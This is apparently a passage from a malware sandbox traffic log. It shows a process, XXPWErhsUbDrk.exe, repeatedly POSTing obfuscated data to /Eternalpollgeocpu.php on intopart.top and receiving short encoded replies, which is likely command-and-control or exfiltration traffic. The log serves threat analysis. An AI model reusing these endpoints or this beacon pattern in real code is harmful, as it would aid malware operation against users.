55 20 38 19 10 25 22 00 1a 26 0b 2b 18 36 38 24 55 2b 3a 20 5f 26 32 04 11 25 54 3a 56 2d 55 27 42 37 3c 22 04 25 3d 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98 X?;&T202'W1+)Y.&^/X"P'4,Z7)+%?U(4 Y:&9^&X;)!&6.4>0<%(0-(',>!]'';U<,R (0U 8%"&+68$U+: _&2%T:V-U'B7<"%=!\/ I4]S
Apr 29, 2024 01:03:20.704294920 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49786	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:20.924870968 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:21.036001921 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:21.036187887 CEST	1080	OUT	Data Raw: 58 58 5f 5c 55 59 5b 55 54 56 50 51 5a 51 51 57 5b 5e 5e 45 54 59 50 45 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XX_\UY[UTVPQZQQW[^^ETYPE]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$1>$ 1;1%;<W$>8=::(>/S$U,,<* U%3* Z/!Z/
Apr 29, 2024 01:03:21.433197021 CEST	579	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jcmBVAs7ZTd3GGaHwwvqYwg0RDRAEfFX%2BBb7bz6iGz615DDEpEfRL4SlrB9roh2GIBo8fbm%2BUQya4VZEHLspDSuZE5Nw56PtbcEzFRQLBBQ7dOltWMz6KTIVUoqFcOI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf642f26e180-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:21.433227062 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49787	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:21.658667088 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:21.768809080 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:21.768948078 CEST	1080	OUT	Data Raw: 58 5b 5a 5f 50 5a 5e 55 54 56 50 51 5a 50 51 52 5b 5c 5e 43 54 5e 50 46 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X[Z_PZ^UTVPQZPQR[\^CT^PF]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$2;#2?1:85,T'><**:<?P'3<,\#0%0: Z/!Z/<
Apr 29, 2024 01:03:22.190656900 CEST	574	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2KoVegV7khS09nhyO5k7%2BKFUgoFFaAW8Jy1fy4AFGjcnfIH5gZ%2BXl8%2Fsll3gv9O1oVlgdTvOPsE9DjqoQveyPMSLbogvvgZumBuHvXn%2FOnI69CDnsLmkqT1U0YbYUGs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf68b82f113c-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:03:22.190738916 CEST	14	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<ZYT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49788	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:22.425050020 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:22.536025047 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:22.540258884 CEST	1080	OUT	Data Raw: 58 53 5f 5f 50 5e 5b 5f 54 56 50 51 5a 50 51 52 5b 5f 5e 43 54 5b 50 49 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XS__P^[_TVPQZPQR[_^CT[PI]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$1#2<2=5\,6,W&-<_*-<0'3$,/![733 Z/!Z/<
Apr 29, 2024 01:03:22.936774969 CEST	581	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YGiWJJ4iRUPBZt8fAMu9EFDBPvMfd2PZ9VulEPO7IY3gCrYh1EGduVD68N5ajLqv2ZOiFFy8HEeA8JYnM7BO0eJjmbJUPtDUPrJfacU%2B%2FPgk22tGog%2BUS0bVGoGhCF4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf6d8add13cb-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:22.936809063 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49789	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:24.510818005 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:24.620783091 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:24.621141911 CEST	1080	OUT	Data Raw: 58 5a 5a 5c 55 5a 5b 5e 54 56 50 51 5a 57 51 51 5b 59 5e 47 54 5d 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XZZ\UZ[^TVPQZWQQ[Y^GT]PA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'%$710\$=5-%(Q'>8=>+3$3;?> Z3 Z/!Z/
Apr 29, 2024 01:03:25.039441109 CEST	577	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZkaOIYxm03FUOkQXZVd5B33ufxUy0LgnHhiEfTlb3j%2FpEV4TtZEy4oUD44zzHAXtgyjnCpUXS0yy0cfoEHdeFhM7uVhfGwm21twDkbAyPZQJbH1sFRITnzSSFTDP9Pk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf7a8d7a2c70-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:25.039473057 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49790	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:25.321063995 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:25.431123018 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:25.432352066 CEST	1080	OUT	Data Raw: 5d 5d 5a 5b 55 5a 5b 55 54 56 50 51 5a 54 51 5b 5b 52 5e 42 54 52 50 40 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]]Z[UZ[UTVPQZTQ[[R^BTRP@]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$'.,_42&:/6,'-$=(.#V3'//76& Z/!Z/,
Apr 29, 2024 01:03:25.849071980 CEST	568	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YrliWukWiL1iowVwFU629yEHLKKb0hafKVSHI083RSV4pNTJQzpg%2BlRfKPOUtxoAXTZ8b7AyHf6528O7K5ureaXPrkMCw1U203n1RRhG3ObTmRSKaeCFlGtT2LVDxmU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf7f9dbe1105-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:03:25.849101067 CEST	9	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:25.849109888 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49791	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:25.834630966 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1760 Expect: 100-continue
Apr 29, 2024 01:03:25.946778059 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:25.947000027 CEST	1760	OUT	Data Raw: 5d 59 5a 5b 50 5a 5b 5f 54 56 50 51 5a 5e 51 50 5b 5b 5e 41 54 5e 50 42 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]YZ[PZ[_TVPQZ^QP[[^AT^PB]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$%#1,2>-&,3Z)9>U(.#&3 ;=]"#"^': Z/!Z/
Apr 29, 2024 01:03:26.324364901 CEST	732	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ass1w9P2nDk2EwvDrES%2FAhKHzLrFR%2BFB7ZCm2ZLeeS21RKKZUHI3nPlqpzlR%2F0hu5fYbKzLax2ImSKI6rFwgi7oMca3fFBHi7cmYbNFxidTM9MeIDjIH0%2FJwxKXH2sI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf82db1e1160-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 23 02 3c 02 32 0c 2a 22 26 55 33 31 2f 51 31 59 3f 1a 28 3c 31 1c 32 0d 0a 5a 2d 2e 00 14 30 24 0a 5e 34 17 30 1d 26 08 3c 0f 2a 24 20 59 02 1c 3a 1b 26 5f 2e 1c 26 10 05 14 3f 1c 35 5c 23 3d 27 01 2a 28 0b 0e 24 3f 3e 05 2b 0d 25 01 2b 3a 27 0d 39 03 21 5d 27 37 05 56 28 0f 2c 52 08 13 20 52 3f 0e 3b 0f 36 16 3b 57 30 31 26 59 26 1b 01 52 21 38 24 1c 28 29 2c 15 26 22 3d 01 26 0b 32 1e 3a 0d 20 1d 20 2c 21 11 30 2d 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98#<2"&U31/Q1Y?(<12Z-.0$^40&<$ Y:&_.&?5\#='*($?>+%+:'9!]'7V(,R R?;6;W01&Y&R!8$(),&"=&2: ,!0-!\/ I4]S
Apr 29, 2024 01:03:26.324434996 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49792	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:26.094540119 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:26.205290079 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:26.205492020 CEST	1080	OUT	Data Raw: 5d 59 5a 5f 55 5e 5e 55 54 56 50 51 5a 5e 51 50 5b 59 5e 49 54 5f 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]YZ_U^^UTVPQZ^QP[Y^IT_PA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_']'.;!1'29],(0 Y):-<-<33//?&7 )3 Z/!Z/
Apr 29, 2024 01:03:26.589536905 CEST	572	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=43GGhwIxr4KCGyGquGdf%2BEWGYZquux1m2VX10bkoeeaFxunnAetGqqyXoPAsKDc4ntzZ4gDMEAm0rJP51aVPvh7AEJe%2FxRTEIAgFZ3Otx0dhYqyn%2BfQy2aw9NsXK108%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf8479c5636e-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:03:26.589595079 CEST	9	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:26.589631081 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49793	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:26.814485073 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:26.927752972 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:26.928025007 CEST	1080	OUT	Data Raw: 5d 59 5a 59 50 5b 5b 55 54 56 50 51 5a 54 51 5b 5b 58 5e 41 54 59 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]YZYP[[UTVPQZTQ[[X^ATYPA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'2.;7,1.\-&($=)R)-$00#,&7 %$* Z/!Z/,
Apr 29, 2024 01:03:27.313679934 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qvxdczhzNLMB3ppdliyE7XaoqcPdVl0%2Br0%2BBfkI5lXsHEqaNf2dr8a%2BXt6c39Kn1ncbr1ZVnWyDxOmKYnkChOgsXjGRLk54b%2B5o3fmsOW2HfszygqKGFQ6PXMAvTVtI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf88f9172998-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:27.313710928 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49794	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:27.597063065 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:27.707488060 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:27.726479053 CEST	1080	OUT	Data Raw: 5d 59 5a 50 55 56 5b 5f 54 56 50 51 5a 5f 51 54 5b 5b 5e 44 54 53 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]YZPUV[_TVPQZ_QT[[^DTSPD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'[17T0&;%$=+=*).00'R,Y& U"_3 Z/!Z/
Apr 29, 2024 01:03:28.128911018 CEST	589	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O60Eb5zBk0%2FPrp1MEeU6pwGAu4QAEeNgkIbNXeDqC2RQJ9Gn%2F6YnW8fbGUKbGCmfNx5DXTsu29H3w%2F%2BpuFprq%2FI%2FnULb75lixaQ7J2Wu2GIy%2FSb552Is3grwSeYVKSY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf8ddffd9123-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:28.128958941 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49795	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:29.265672922 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:29.375639915 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:29.375814915 CEST	1080	OUT	Data Raw: 5d 5e 5a 58 55 58 5e 53 54 56 50 51 5a 53 51 56 5b 53 5e 48 54 52 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]^ZXUX^STVPQZSQV[S^HTRPA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'[&><^4?2=]-5 W0[0[:)?W33,<:4053 Z/!Z/0
Apr 29, 2024 01:03:29.778788090 CEST	572	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6dpKKwFY6Jt9jUK3FB%2FoCviACTPFr41NXy5LhzatF3NBygW%2BCAxH28jqHEN2Nl1%2FVMQXNwzPTEpKJ4eNDH1k8GsNZDEVbdIiCyuiz7Ghmfh65AgeRFAXQjsbD1OV3p8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf9849b1617e-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:03:29.778841972 CEST	14	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<ZYT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49796	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:30.053055048 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:30.163781881 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:30.163950920 CEST	1080	OUT	Data Raw: 58 5f 5a 5e 55 5c 5b 5f 54 56 50 51 5a 55 51 5a 5b 53 5e 40 54 5d 50 45 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X_Z^U\[_TVPQZUQZ[S^@T]PE]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$1?72+&>,0P0=8Y):V(V'3U,? #9&: Z/!Z/(
Apr 29, 2024 01:03:30.552684069 CEST	572	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BYoUOIQzpXP%2BWbe4nMBtWXdFqT2x6MlnJhq9fYXe5JTZDq4Ss9aB26p7l8L5ON51OPX9yHeqTRXzafQycpd%2Bxins90o%2BY0XoG0FDQGtaFe1eVjiFWz0hvlosYtprlEQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaf9d3a82e1b6-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:03:30.552728891 CEST	9	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
